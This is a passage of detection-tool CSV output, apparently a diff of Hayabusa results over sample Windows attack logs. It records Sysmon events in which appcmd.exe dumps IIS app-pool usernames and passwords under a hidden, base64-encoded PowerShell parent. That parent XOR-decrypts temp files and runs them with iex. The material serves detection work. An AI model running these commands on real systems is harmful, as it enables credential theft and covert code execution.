JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Filename: redirection.config"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Filename: redirection.config"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0